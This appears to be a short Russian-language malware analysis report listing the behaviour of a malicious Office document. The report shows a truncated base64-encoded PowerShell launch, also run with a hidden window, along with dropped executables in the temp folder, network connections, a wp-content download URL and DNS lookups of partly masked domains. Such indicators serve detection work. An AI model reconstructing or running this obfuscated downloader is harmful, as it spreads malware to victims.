Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTADIANgBfAGQANAA0AD0AKAAnAFcAJwArACgAJwBuACcAKwAnAF8AYgAnACkAKwAoACcAOAAnACsAJwA2AGEAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFQAZQBNAFAAXAB3AE8AcgBEAFwAMgAwAD...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1956
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- %TEMP%\845697.cvr
- %TEMP%\word\2019\s1xi8fyw.exe
- %TEMP%\word\2019\s1xi8fyw.exe
- 'in####ricatoday.com':443
- 'go####tmoving.com':80
- http://go####tmoving.com/wp-content/3QC/
- DNS ASK in####ricatoday.com
- DNS ASK go####tmoving.com
- DNS ASK il####mercial.cl
- DNS ASK ha#h.cz
- DNS ASK my####llastuffs.xyz
- DNS ASK co###-shop.ru
- DNS ASK ca###s.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTADIANgBfAGQANAA0AD0AKAAnAFcAJwArACgAJwBuACcAKwAnAF8AYgAnACkAKwAoACcAOAAnACsAJwA2AGEAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFQAZQBNAFAAXAB3AE8AcgBEAFwAMgAwAD... (со скрытым окном)